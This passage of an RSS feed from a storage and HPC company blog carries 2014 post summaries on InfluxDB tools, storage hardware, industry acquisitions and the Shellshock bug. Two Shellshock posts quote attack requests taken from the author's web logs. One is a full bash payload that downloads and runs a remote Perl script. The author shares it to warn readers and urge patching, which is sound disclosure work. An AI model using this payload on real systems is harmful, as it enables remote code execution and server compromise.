      <pubDate>Sun, 19 Oct 2014 16:36:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/velocity-matters/</guid>
      <description>For the last decade plus, the day job has been preaching that performance is an advantage, a feature you need, a technological barrier for those with both inefficient infrastructures and built-in resistance to addressing these issues. You find the latter usually at organizations with purchasing groups that dominate the users and the business owners. The advent of big data (ok, this is the second or third time around now), with data sets that have been pushing the performance capabilities of infrastructure, has been putting the exclamation point on this for the past few years.</description>
    </item>
    
    <item>
      <title>And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module</title>
      <link>https://blog.scalability.org/2014/10/and-the-0-8-3-influxdb-no-longer-works-with-the-influxdb-perl-module/</link>
      <pubDate>Thu, 16 Oct 2014 02:30:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/and-the-0-8-3-influxdb-no-longer-works-with-the-influxdb-perl-module/</guid>
      <description>I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and &amp;hellip; and &amp;hellip; Yup, it&amp;rsquo;s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler, more general Time Series Database interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.</description>
    </item>
    
    <item>
      <title>A good read on a bootstrapped company</title>
      <link>https://blog.scalability.org/2014/10/a-good-read-on-a-bootstrapped-company/</link>
      <pubDate>Wed, 15 Oct 2014 16:06:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/a-good-read-on-a-bootstrapped-company/</guid>
      <description>Zoho makes a number of things, including a CRM, that we use. And they are bootstrapped. Like us. There are significant market differences between us and them, but many of the things noted in the article are common truths.
 If you don&amp;rsquo;t start with building a real company, you won&amp;rsquo;t have a real company. The decisions you make when your own ass is on the line are very different from the ones you might make if it&amp;rsquo;s someone else&amp;rsquo;s ass, and money, for that matter.</description>
    </item>
    
    <item>
      <title>There are times</title>
      <link>https://blog.scalability.org/2014/10/there-are-times/</link>
      <pubDate>Thu, 09 Oct 2014 03:27:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/there-are-times/</guid>
      <description>&amp;hellip; when, during a support call, we see the magnitude of the self-inflicted damage, and ask ourselves exactly why they did this to themselves. Today was like this. We do what we can to protect people from the dangerous, rapidly moving sharp objects underneath the hood (or boot). We abstract things, tell them not to put fingers near the spinny blades. Yes, it&amp;rsquo;s a metaphor. Today was a day of Pyrrhic victories.</description>
    </item>
    
    <item>
      <title>massive unapologetic firepower part 2 ... the dashboard ...</title>
      <link>https://blog.scalability.org/2014/10/massive-unapologetic-firepower-part-2-the-dashboard/</link>
      <pubDate>Tue, 07 Oct 2014 18:10:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/massive-unapologetic-firepower-part-2-the-dashboard/</guid>
      <description>For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job&amp;rsquo;s FastPath product.</description>
    </item>
    
    <item>
      <title>HP to split up</title>
      <link>https://blog.scalability.org/2014/10/hp-to-split-up/</link>
      <pubDate>Mon, 06 Oct 2014 01:39:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/hp-to-split-up/</guid>
      <description>Interesting changes in the corporate M&amp;amp;A or disaggregation arena. With M&amp;amp;A, you are looking to build market strength by acquiring valuable IP, assets, brands, names, teams, capabilities, trade secrets, special sauces, etc. You do that to make your group stronger and more capable of handling the challenges ahead. With a disaggregation, you slice off disparate portions of the business, and set them free to pursue their own path. This is what was rumored a few weeks ago with EMC, a possible split of the federated businesses.</description>
    </item>
    
    <item>
      <title>Shellshock is worse than heartbleed</title>
      <link>https://blog.scalability.org/2014/10/shellshock-is-worse-than-heartbleed/</link>
      <pubDate>Wed, 01 Oct 2014 05:39:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/10/shellshock-is-worse-than-heartbleed/</guid>
      <description>In part because, well, the patches don&amp;rsquo;t seem to cover all the exploits. For the gory details, look at the CVE list here. Then cut and paste the local exploits. Even with the latest patched source, built from scratch, there are active working compromises. With heartbleed, all we had to do was nuke keys, patch/update packages, restart machines, cross fingers. This is worse, in that the fixes &amp;hellip; well &amp;hellip; don&amp;rsquo;t.</description>
    </item>
    
    <item>
      <title>... and the shell shock attempts continue ...</title>
      <link>https://blog.scalability.org/2014/09/and-the-shell-shock-attempts-continue/</link>
      <pubDate>Mon, 29 Sep 2014 18:57:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/and-the-shell-shock-attempts-continue/</guid>
      <description>From 174.143.168.121 (174-143-168-121.static.cloud-ips.com)
Request: &#39;() { :;}; /bin/bash -c &amp;quot;wget ellrich.com/legend.txt -O /tmp/.apache;killall -9 perl;perl /tmp/.apache;rm -rf /tmp/.apache&amp;quot;&#39;  </description>
    </item>
    
    <item>
      <title>Updated boot tech in Scalable OS (SIOS)</title>
      <link>https://blog.scalability.org/2014/09/updated-boot-tech-in-scalable-os-sios/</link>
      <pubDate>Mon, 29 Sep 2014 03:42:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/updated-boot-tech-in-scalable-os-sios/</guid>
      <description>This has been an itch we&amp;rsquo;ve been working on scratching a few different ways, and it&amp;rsquo;s very much related to forgoing distro-based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn&amp;rsquo;t matter if it&amp;rsquo;s RAIDed in hardware/software. It&amp;rsquo;s a pathway that can fail. And when it fails, all hell breaks loose.</description>
    </item>
    
    <item>
      <title>That may be the fastest I&#39;ve seen an exploit go from &#34;theoretical&#34; to &#34;used&#34;</title>
      <link>https://blog.scalability.org/2014/09/that-may-be-the-fastest-ive-seen-an-exploit-go-from-theoretical-to-used/</link>
      <pubDate>Thu, 25 Sep 2014 18:43:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/that-may-be-the-fastest-ive-seen-an-exploit-go-from-theoretical-to-used/</guid>
      <description>Found in our web logs this afternoon. This is bash shellshock.
Request: &#39;() {:;}; /bin/ping -c 1 104.131.0.69&#39;  This bad boy came from the University of Oklahoma, IP address 157.142.200.11. The ping address 104.131.0.69 is something called shodan.io. Patch this one, folks. Remote execution badness, and all that goes along with it.</description>
    </item>
    
    <item>
      <title>Interesting bits around EMC</title>
      <link>https://blog.scalability.org/2014/09/interesting-bits-around-emc/</link>
      <pubDate>Thu, 25 Sep 2014 14:20:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/interesting-bits-around-emc/</guid>
      <description>In the last few days, issues around EMC have become publicly known. EMC is the world&amp;rsquo;s largest and most profitable storage company, and has a federated group of businesses that are complementary to it. The CEO, Joe Tucci, is stepping down next year, and there is a succession &amp;ldquo;process&amp;rdquo; going on. Couple this to a fundamental shift in storage, from arrays to distributed tightly coupled server storage, such as Unison, which is problematic for their core business.</description>
    </item>
    
    <item>
      <title>sios-metrics code now on github</title>
      <link>https://blog.scalability.org/2014/09/sios-metrics-code-now-on-github/</link>
      <pubDate>Mon, 15 Sep 2014 14:23:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/sios-metrics-code-now-on-github/</guid>
      <description>See link for more details. It allows us to gather many metrics, saves them nicely in the database. This enables very rapid and simple data collection, even for complex data needs.</description>
    </item>
    
    <item>
      <title>Solved the major socket bug ... and it was a layer 8 problem</title>
      <link>https://blog.scalability.org/2014/09/solved-the-major-socket-bug-and-it-was-a-layer-8-problem/</link>
      <pubDate>Sun, 14 Sep 2014 15:52:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/solved-the-major-socket-bug-and-it-was-a-layer-8-problem/</guid>
      <description>I&amp;rsquo;d like to offer an excuse. But I can&amp;rsquo;t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000  Then I invoked the code. And the data showed up. Without a ()&amp;amp;(&amp;amp;%&amp;amp;$%*&amp;amp;(^ newline. That couldn&amp;rsquo;t possibly be it. Could it? No. It&amp;rsquo;s way too freaking simple.</description>
    </item>
    
    <item>
      <title>New monitoring tool, and a very subtle bug</title>
      <link>https://blog.scalability.org/2014/09/new-monitoring-tool-and-a-very-subtle-bug/</link>
      <pubDate>Sun, 14 Sep 2014 01:31:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/new-monitoring-tool-and-a-very-subtle-bug/</guid>
      <description>I&amp;rsquo;ve been working on coding up some additional monitoring capability, and had an idea a long time ago for a very general monitoring concept. Nothing terribly original, not quite nagios, but something easier to use/deploy. Finally I decided to work on it today. The monitoring code talks to a graphite backend. Could talk to statsd, or other things. In this case, we are using the InfluxDB plugin for graphite. I wanted an insanely simple local data collector.</description>
    </item>
    
    <item>
      <title>New 8TB and 10TB drives from HGST, fit nicely into Unison</title>
      <link>https://blog.scalability.org/2014/09/new-8tb-and-10tb-drives-from-hgst-fit-nicely-into-unison/</link>
      <pubDate>Tue, 09 Sep 2014 23:35:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/new-8tb-and-10tb-drives-from-hgst-fit-nicely-into-unison/</guid>
      <description>The TL;DR version: Imagine 60x 8TB drives (480TB, about 1/2 PB) in a 4U unit, or 4.8PB in a rack. Now make those 10TB drives. 600TB in 4U. 6PB in a full rack. These are shingled drives, great for &amp;ldquo;cold&amp;rdquo; storage, object storage, etc. One of the many functions that Unison is used for. These aren&amp;rsquo;t really for standard POSIX file systems, as your read-modify-write length is of the order of a GB or so, on a per-drive basis.</description>
    </item>
    
    <item>
      <title>The Haswells are (officially) out</title>
      <link>https://blog.scalability.org/2014/09/the-haswells-are-officially-out/</link>
      <pubDate>Tue, 09 Sep 2014 02:03:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/the-haswells-are-officially-out/</guid>
      <description>Great article summarizing information about them here. Of course, everyone and their brother put out press releases indicating that they would be supporting them. Rather than add to that cacophony (ok, just a little: All Scalable Informatics platforms are available with the Haswell architecture, more details including benchies &amp;hellip; soon &amp;hellip;) we figured we&amp;rsquo;d let it die down, as the meaningful information will come from real user cases. Haswell is interesting for a number of reasons, not the least of which is 16 DP FLOPs/cycle, but fundamentally, it&amp;rsquo;s a more efficient/faster chip in many regards.</description>
    </item>
    
    <item>
      <title>Be sure to vote for your favorites in the HPCWire readers choice awards</title>
      <link>https://blog.scalability.org/2014/09/be-sure-to-vote-for-your-favorites-in-the-hpcwire-readers-choice-awards/</link>
      <pubDate>Mon, 08 Sep 2014 21:23:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/be-sure-to-vote-for-your-favorites-in-the-hpcwire-readers-choice-awards/</guid>
      <description>Scalable Informatics is nominated in
 #12 for Best HPC storage product or technology, #20 Top supercomputing achievement, which could be for this, this on a single storage box, or this result, #21 Top 5 new products or technologies to watch for our Unison, and #22 for Top 5 vendors to watch. Our friends at Lucera are nominated for #4, Best use of HPC in financial services. Please do vote for us and our friends at Lucera!</description>
    </item>
    
    <item>
      <title>InfluxDB cli is up on github</title>
      <link>https://blog.scalability.org/2014/09/influxdb-cli-is-up-on-github/</link>
      <pubDate>Fri, 05 Sep 2014 19:31:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/influxdb-cli-is-up-on-github/</guid>
      <description>I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and &amp;hellip; well &amp;hellip; Link is here. And yes, the readme is borked about 1/2 way through. It doesn&amp;rsquo;t show the formatting of the output quite right. Will try to fix over the weekend, as I move this to a far more feature-complete bit.</description>
    </item>
    
    <item>
      <title>Time series databases for metrics part 2</title>
      <link>https://blog.scalability.org/2014/09/time-series-databases-for-metrics-part-2/</link>
      <pubDate>Wed, 03 Sep 2014 20:12:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/time-series-databases-for-metrics-part-2/</guid>
      <description>So I&amp;rsquo;ve been working with influxdb for a while now, and have a working/credible cli for it. I&amp;rsquo;ll have to put it up on github soon. I am using it mostly as a graphite replacement, as it&amp;rsquo;s a compiled app versus Python code, and Python isn&amp;rsquo;t terribly fast for this sort of work. We want to save lots of data, and do so with 1 second resolution. Imagine I want to save a 64 bit measurement, and I am gathering say 100 per second.</description>
    </item>
    
    <item>
      <title>An article on Detroit that is worth the read</title>
      <link>https://blog.scalability.org/2014/09/an-article-on-detroit-that-is-worth-the-read/</link>
      <pubDate>Wed, 03 Sep 2014 19:46:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/09/an-article-on-detroit-that-is-worth-the-read/</guid>
      <description>Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn&amp;rsquo;t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.</description>
    </item>
    
    <item>
      <title>XKCD on thesis defense</title>
      <link>https://blog.scalability.org/2014/08/xkcd-on-thesis-defense/</link>
      <pubDate>Thu, 28 Aug 2014 02:21:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/xkcd-on-thesis-defense/</guid>
      <description>I guess I did it wrong &amp;hellip; See here</description>
    </item>
    
    <item>
      <title>Definition of vacation</title>
      <link>https://blog.scalability.org/2014/08/definition-of-vacation/</link>
      <pubDate>Wed, 27 Aug 2014 20:11:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/definition-of-vacation/</guid>
      <description>&amp;hellip; appears to be normal working hours from a location that is not your office, home &amp;hellip; I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.</description>
    </item>
    
    <item>
      <title>Have a nice cli for InfluxDB</title>
      <link>https://blog.scalability.org/2014/08/have-a-nice-cli-for-influxdb/</link>
      <pubDate>Fri, 15 Aug 2014 21:34:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/have-a-nice-cli-for-influxdb/</guid>
      <description>I tried the nodejs version and &amp;hellip; well &amp;hellip; it was horrible. Basic things didn&amp;rsquo;t work. Made life very annoying. So, being a good engineering type, I wrote my own. It will be up on our site soon. Here&amp;rsquo;s an example
./influxdb-cli.pl --host 192.168.5.117 --user test --pass test --db metrics  metrics&amp;gt; \list series
.----------------------------------. | series name | +----------------------------------+ | lightning.cpuload.avg1 | | lightning.cputotals.idle | | lightning.cputotals.irq | | lightning.</description>
    </item>
    
    <item>
      <title>Scalable Informatics 12 year anniversary</title>
      <link>https://blog.scalability.org/2014/08/scalable-informatics-12-year-anniversary/</link>
      <pubDate>Thu, 14 Aug 2014 15:32:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/scalable-informatics-12-year-anniversary/</guid>
      <description>I had forgotten to mention, but we hit our 12 year mark on the 1st of August. We&amp;rsquo;ve grown from a small &amp;ldquo;garage&amp;rdquo; based company (really &amp;ldquo;basement-based&amp;rdquo; in Michigan, as garages aren&amp;rsquo;t heated in winter, nor cooled in summer here), with one guy doing consulting, cluster system builds, tuning, benchmarking, white paper writing &amp;hellip; to a 10 person outfit building the world&amp;rsquo;s fastest and densest tightly coupled storage and computing systems.</description>
    </item>
    
    <item>
      <title>Time series databases and system metrics</title>
      <link>https://blog.scalability.org/2014/08/time-series-databases-and-system-metrics/</link>
      <pubDate>Thu, 14 Aug 2014 15:24:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/time-series-databases-and-system-metrics/</guid>
      <description>I am working on updating our FastPath appliance web management/monitoring gui for the day job. Trying to push data into databases for later analysis. Many tools have been written on the collection side, statsd, fluentd, &amp;hellip; and some are actually pretty cool. The concern for me is the way these tools express their analytical and storage opinions, which is done on the storage side. The data collection side isn&amp;rsquo;t an issue; if anything, it&amp;rsquo;s a breath of fresh air relative to what else I&amp;rsquo;ve seen.</description>
    </item>
    
    <item>
      <title>Comcast finally fixed their latency issue</title>
      <link>https://blog.scalability.org/2014/08/comcast-finally-fixed-their-latency-issue/</link>
      <pubDate>Mon, 04 Aug 2014 20:47:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/comcast-finally-fixed-their-latency-issue/</guid>
      <description>This has been a point of contention for us for years. Our office has multiple network attachments, and Comcast is part of it. This is the main office, not the home office. Latency on the link, as measured by DNS pings, has always been fairly high, in the 2-3ms region, as compared to our other connection (using a different provider and a different technology), which has been consistently 0.5ms for the last 2 years.</description>
    </item>
    
    <item>
      <title>π kernel achieved ....</title>
      <link>https://blog.scalability.org/2014/08/kernel-achieved/</link>
      <pubDate>Fri, 01 Aug 2014 16:30:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/08/kernel-achieved/</guid>
      <description>From kernel.org</description>
    </item>
    
    <item>
      <title>Be on the lookout for &#39;pauses&#39; in CentOS/RHEL 6.5 on Sandy Bridge</title>
      <link>https://blog.scalability.org/2014/07/be-on-the-lookout-for-pauses-in-centosrhel-6-5-on-sandy-bridge/</link>
      <pubDate>Thu, 31 Jul 2014 00:25:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/be-on-the-lookout-for-pauses-in-centosrhel-6-5-on-sandy-bridge/</guid>
      <description>Probably on Ivy Bridge as well. Short version: the pauses that plagued Nehalem and Westmere are baaaack. In RHEL/CentOS 6.5 anyway. A customer just ran into one. We helped diagnose/work around this a few years ago when a hedge fund customer ran into this &amp;hellip; then a post-production shop &amp;hellip; then &amp;hellip; Basically, the problem came in from the C-states. With the deeper sleep states, in some instances, the processor would not come out of them, or would get stuck in the lower levels.</description>
    </item>
    
    <item>
      <title>The best thing one can do with the tuned system is</title>
      <link>https://blog.scalability.org/2014/07/the-best-thing-one-can-do-with-the-tuned-system-is/</link>
      <pubDate>Thu, 31 Jul 2014 00:04:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/the-best-thing-one-can-do-with-the-tuned-system-is/</guid>
      <description>yum remove tuned tuned-utils  This isn&amp;rsquo;t quite as bad as THP, but it&amp;rsquo;s close.</description>
    </item>
    
    <item>
      <title>Soon ... 12g goodness in new chassis</title>
      <link>https://blog.scalability.org/2014/07/soon-12g-goodness-in-new-chassis/</link>
      <pubDate>Wed, 30 Jul 2014 16:30:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/soon-12g-goodness-in-new-chassis/</guid>
      <description>This is one of our engineering prototypes that we had to clear space for. A couple of new features I&amp;rsquo;ll talk about soon, but you should know that these are 12g SAS machines (will do 6g SATA of course as well).
 Front of unit:
[ ](/images/IMG_2330.JPG)
Note the new logo/hand bar. The rails are also brand new, and are set to enable easy slide in/out even with 100+ lbs of disk in them.</description>
    </item>
    
    <item>
      <title>Comcast disabled port 25 mail on our business account</title>
      <link>https://blog.scalability.org/2014/07/comcast-disabled-port-25-mail-on-our-business-account/</link>
      <pubDate>Sun, 20 Jul 2014 19:20:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/comcast-disabled-port-25-mail-on-our-business-account/</guid>
      <description>We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I&amp;rsquo;ve been running an SMTP server, complete with antispam/antivirus/&amp;hellip; for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.</description>
    </item>
    
    <item>
      <title>Fantastic lecture from Michael Crichton</title>
      <link>https://blog.scalability.org/2014/07/fantastic-lecture-from-michael-crichton/</link>
      <pubDate>Sat, 19 Jul 2014 13:17:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/fantastic-lecture-from-michael-crichton/</guid>
      <description>This is Michael Crichton of Andromeda Strain, Jurassic Park, and other stories. A fantastic storyteller, he absolutely nails his subject. The original was on his website, and I grabbed a copy from here. One of the wonderful quotable paragraphs within is this:
A real scientist is, by its own very definition, a skeptic.</description>
    </item>
    
    <item>
      <title>But ... GaAs is the material of the future ... and always will be ...</title>
      <link>https://blog.scalability.org/2014/07/but-gaas-is-the-material-of-the-future-and-always-will-be/</link>
      <pubDate>Fri, 18 Jul 2014 20:05:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/but-gaas-is-the-material-of-the-future-and-always-will-be/</guid>
      <description>I read a note on IBM&amp;rsquo;s recent allocation of capital towards research projects. It had this tidbit in there:
Well, there is a range of III-V materials, not just GaAs. One of the big issues is the lattice mismatch between Si and many of the III-V materials. This strain introduces &amp;ldquo;artifacts&amp;rdquo; in the band structure, not to mention structural morphologies. That said, those artifacts may be what the engineers want. Aluminum phosphide and gallium phosphide are pretty well matched to Si.</description>
    </item>
    
    <item>
      <title>Too simple to be wrong</title>
      <link>https://blog.scalability.org/2014/07/too-simple-to-be-wrong/</link>
      <pubDate>Sun, 06 Jul 2014 15:28:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/too-simple-to-be-wrong/</guid>
      <description>I&amp;rsquo;ve been exercising my mad-programming skillz for a while on a variety of things. I got it in my head to port the benchmarks posted on julialang.org to perl a while ago, so I&amp;rsquo;ve been working on this in the background for a few weeks. I also plan, at some point, to rewrite them in q/kdb+, as I&amp;rsquo;ve been really wanting to spend more time with it. The benchmarks aren&amp;rsquo;t hard to rewrite.</description>
    </item>
    
    <item>
      <title>OS and distro as a detail of a VM/container</title>
      <link>https://blog.scalability.org/2014/07/os-and-distro-as-a-detail-of-a-vmcontainer/</link>
      <pubDate>Thu, 03 Jul 2014 22:03:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/os-and-distro-as-a-detail-of-a-vmcontainer/</guid>
      <description>An interesting debate came about on the Beowulf list. Basically, someone asked if they could use Gentoo as a distro for building a cluster, after seeing a post from someone who did something similar. The answer of course is &amp;ldquo;yes&amp;rdquo;, with the more detailed answer being that you use what you need to build the cluster and provide the cycles that you or your users will consume. Hey, look, if someone really, truly wants to run their DOS application, Tiburon/Scalable OS will boot it.</description>
    </item>
    
    <item>
      <title>Scratching my head over a weird bonding issue</title>
      <link>https://blog.scalability.org/2014/07/scratching-my-head-over-a-weird-bonding-issue/</link>
      <pubDate>Thu, 03 Jul 2014 21:50:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/scratching-my-head-over-a-weird-bonding-issue/</guid>
      <description>Trying to set up a channel bond into a 10GbE LAG. Set up the bonding module, using the &amp;lsquo;miimon=200 mode=802.3ad&amp;rsquo; options. The switch was sending LACP packets, 1/sec, to the NICs. The bond formed on the NICs. But it didn&amp;rsquo;t seem to negotiate the LACP circuit correctly with the switch. The switch never registered it. I&amp;rsquo;ve not seen that one before. With Mellanox, Arista, Cisco, and others like that, the LACP circuit forms correctly and quickly.</description>
    </item>
    
    <item>
      <title>New customers</title>
      <link>https://blog.scalability.org/2014/07/new-customers/</link>
      <pubDate>Thu, 03 Jul 2014 21:45:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/07/new-customers/</guid>
      <description>We have a number of nice new customers that have been absorbing about all of my time for the last few weeks. This is goodness. One has our current generation FastPath Cadence SSD converged computing and storage system, and will be running kdb+ on it. Another has a 1PB Unison parallel file system, and while we did the previous 2TB write in 73 seconds with it, we did some tuning and tweaking and are down to 68 seconds.</description>
    </item>
    
    <item>
      <title>M&amp;A:  PLX snarfed by ... Avago ?</title>
      <link>https://blog.scalability.org/2014/06/ma-plx-snarfed-by-avago/</link>
      <pubDate>Tue, 24 Jun 2014 14:09:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/ma-plx-snarfed-by-avago/</guid>
      <description>Ok, didn&amp;rsquo;t see this acquirer coming, but PLX being bought &amp;hellip; yeah, this makes sense. Avago looks like they are trying to become the glue between systems, whether the glue is a data storage fabric, or communications fabric, etc. PLX makes PCIe switches and other kit. PCIe switch and interconnection is the direction that many are converging to. Best end to end latencies, best per-lane performance, no protocol stack silliness to deal with.</description>
    </item>
    
    <item>
      <title>M&amp;A: SanDisk snarfs FusionIO for $1.1B USD</title>
      <link>https://blog.scalability.org/2014/06/ma-sandisk-snarfs-fusionio-for-1-1b-usd/</link>
      <pubDate>Mon, 16 Jun 2014 16:09:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/ma-sandisk-snarfs-fusionio-for-1-1b-usd/</guid>
      <description>This is only the beginning folks &amp;hellip; only the beginning. See this. FusionIO was, quite arguably, in trouble. They needed a buyer to take them to the next level, and to avoid being made completely irrelevant. SanDisk is a natural partner for them. They have the fab and chips, FusionIO has a product. SanDisk has a vision for a flash-only data center. What&amp;rsquo;s interesting about this is that Fusion was one of the last independent enterprise-class PCIe flash vendors.</description>
    </item>
    
    <item>
      <title>Selling inventory to clear space</title>
      <link>https://blog.scalability.org/2014/06/selling-inventory-to-clear-space/</link>
      <pubDate>Wed, 04 Jun 2014 16:50:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/06/selling-inventory-to-clear-space/</guid>
      <description>[Update 16-June] We&amp;rsquo;ve sold the 64 bay FastPath Cadence (siFlash based), and now we have a few more 60 bay hybrid Ceph and FhGFS units, as well as a 48 bay front mount siFlash. What&amp;rsquo;s coming in are many of our next gen 60 bay units, with a new backplane design, and we want to start running benchmarks with them ASAP. As we have limited space in our facility, we gotta make hard choices &amp;hellip; Email me (landman@scalableinformatics.</description>
    </item>
    
    <item>
      <title>Divestment: Violin sells off PCIe flash card</title>
      <link>https://blog.scalability.org/2014/05/divestment-violin-sells-off-pcie-flash-card/</link>
      <pubDate>Fri, 30 May 2014 16:52:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/divestment-violin-sells-off-pcie-flash-card/</guid>
      <description>This article notes that Violin has divested itself of its PCIe flash card. This card was, to a degree, a shot across the Fusion IO/Virident/Micron bows. I don&amp;rsquo;t think it ever was a significant threat to them though. Terms of the sale indicate about $23M cash and assumptions of $0.5M liabilities, as well as hiring the team. What is interesting is where it was sold. Hynix. Yes, the memory chip/flash maker.</description>
    </item>
    
    <item>
      <title>M&amp;A: Seagate acquires LSI&#39;s flash and accelerated bits from Avago</title>
      <link>https://blog.scalability.org/2014/05/ma-seagate-acquires-lsis-flash-and-accelerated-bits-from-avago/</link>
      <pubDate>Fri, 30 May 2014 14:01:09 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/ma-seagate-acquires-lsis-flash-and-accelerated-bits-from-avago/</guid>
      <description>I&amp;rsquo;ve been saying for a while that M&amp;amp;A is going to get more intense as companies gird for the battles ahead. I see component vendors looking at doing vertical integration &amp;hellip; not necessarily to compete with their customers, but to offer them alternatives, reference designs, etc. and capture a portion of the higher margin businesses. This move gives Seagate control over SandForce controllers, and PCIe flash. See this link for more info.</description>
    </item>
    
    <item>
      <title>Massive, unapologetic, firepower: 2TB write in 73 seconds</title>
      <link>https://blog.scalability.org/2014/05/massive-unapologetic-firepower-2tb-write-in-73-seconds/</link>
      <pubDate>Mon, 19 May 2014 20:43:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/massive-unapologetic-firepower-2tb-write-in-73-seconds/</guid>
      <description>A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem   Size  Used  Avail  Use%  Mounted on
fhgfs_nodev  1.</description>
    </item>
    
    <item>
      <title>Insanity in vendor distros</title>
      <link>https://blog.scalability.org/2014/05/insanity-in-vendor-distros/</link>
      <pubDate>Sun, 18 May 2014 21:17:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/insanity-in-vendor-distros/</guid>
      <description>I am not sure if this is specific to SuSE (customer requirement, don&amp;rsquo;t ask), but there is some extreme &amp;hellip; and I really, positively mean, EXTREME &amp;hellip; boneheaded insanity in the dhcp stack in the initrd construction in SuSE. Something that doesn&amp;rsquo;t lend itself well, to, I dunno &amp;hellip; CORRECT AUTOCONFIGURATION OF NETWORK PORTS IN DISKLESS ENVIRONMENTS. Ok, what clued me in was this snippet from the console I&amp;rsquo;ve been struggling with for the past day.</description>
    </item>
    
    <item>
      <title>io-bm released</title>
      <link>https://blog.scalability.org/2014/05/io-bm-released/</link>
      <pubDate>Sun, 18 May 2014 19:01:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/io-bm-released/</guid>
      <description>At long last, and yes, I can&amp;rsquo;t believe I let this slip for years &amp;hellip; It&amp;rsquo;s available here at our git site</description>
    </item>
    
    <item>
      <title>Our new look and feel</title>
      <link>https://blog.scalability.org/2014/05/our-new-look-and-feel/</link>
      <pubDate>Wed, 07 May 2014 23:55:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2014/05/our-new-look-and-feel/</guid>
      <description>Day job website has been updated to something &amp;hellip; modern. Hopefully nothing is broken &amp;hellip; I think it looks great; the Dougs did a terrific job. Seriously, I wound up breaking DNS at the day job (by accident &amp;hellip; really) yesterday, in order to try to rationalize something. Had to roll back our DNS servers to an older code drop. That and I had to spin up a new dedicated mail/dns internal server.</description>
    </item>
    
    <item>
      <title>Building efficient storage and computing platforms has little to do with using cheap hardware</title>
      <link>https://blog.scalability.org/2014/04/building-efficient-storage-and-computing-platforms-has-little-to-do-with-using-cheap-hardware/</link>
      <pubDate>Wed, 30 Apr 2014 15:05:09 +0000</pubDate>
      
